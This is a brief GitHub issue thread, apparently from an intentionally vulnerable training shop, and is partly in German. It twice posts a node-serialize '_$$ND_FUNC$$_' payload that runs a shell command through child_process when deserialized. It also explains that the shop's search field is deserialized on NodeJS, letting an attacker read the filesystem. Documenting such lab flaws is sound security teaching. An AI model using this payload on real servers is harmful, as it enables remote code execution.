patricksteinhaeusl
commented
6 years ago _$$ND_FUNC$$_function (){require('child_process').exec('dir>test.txt'); }()
Closed patricksteinhaeusl closed 6 years ago
patricksteinhaeusl
commented
6 years ago _$$ND_FUNC$$_function (){require('child_process').exec('dir>test.txt'); }()
patricksteinhaeusl
commented
6 years ago Beschreibung der Aufgabenstellung fehlt
Das Suchfeld des Shops wird serailiziert und auf dem NodeJS deserialisiert und beim Response mitgeschickt. Im AngularJS wird unter dem Suchfeld angezeigt, nach was gesucht worden ist. Der Hacker kann somit zum Beispiel das Filesystem auslesen.